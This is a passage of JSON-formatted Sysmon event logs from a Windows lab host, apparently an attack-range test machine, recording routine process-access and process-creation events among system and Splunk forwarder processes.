{"EventTime":"2020-08-01 05:54:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5940,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:54:53.911\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:54:53.911","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:54:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:54:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5941,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:54:53.911\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:54:53.911","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:54:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:54:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5942,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:54:53.911\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:54:53.911","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:54:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:54:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5943,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:54:53.911\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-03AD-5F25-0000-00106BFC0A00}\r\nTargetProcessId: 2820\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:54:53.911","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-03AD-5F25-0000-00106BFC0A00}","TargetProcessId":"2820","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:54:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:54:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5944,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:54:54.051\r\nSourceProcessGUID: {A837DB8D-03AD-5F25-0000-00106BFC0A00}\r\nSourceProcessId: 2820\r\nSourceThreadId: 4940\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nTargetProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:54:54.051","SourceProcessGUID":"{A837DB8D-03AD-5F25-0000-00106BFC0A00}","SourceProcessId":"2820","SourceThreadId":"4940","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","TargetProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","TargetProcessId":"2868","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:54:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:54:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5945,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:54:54.583\r\nProcessGuid: {A837DB8D-03AE-5F25-0000-001037FE0A00}\r\nProcessId: 3344\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Registry monitor\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-regmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25\r\nParentProcessGuid: {A837DB8D-0239-5F25-0000-001064190500}\r\nParentProcessId: 2868\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:54:54.583","ProcessGuid":"{A837DB8D-03AE-5F25-0000-001037FE0A00}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","FileVersion":"8.0.2","Description":"Registry monitor","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-regmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25","ParentProcessGuid":"{A837DB8D-0239-5F25-0000-001064190500}","ParentProcessId":"2868","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:54:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:54:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5946,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:54:54.582\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nSourceProcessId: 2868\r\nSourceThreadId: 2168\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-03AE-5F25-0000-001037FE0A00}\r\nTargetProcessId: 3344\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:54:54.582","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","SourceProcessId":"2868","SourceThreadId":"2168","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-03AE-5F25-0000-001037FE0A00}","TargetProcessId":"3344","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:54:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:54:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5947,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:54:54.582\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-03AE-5F25-0000-001037FE0A00}\r\nTargetProcessId: 3344\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:54:54.582","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-03AE-5F25-0000-001037FE0A00}","TargetProcessId":"3344","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:54:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:54:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5948,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:54:54.582\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:54:54.582","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime"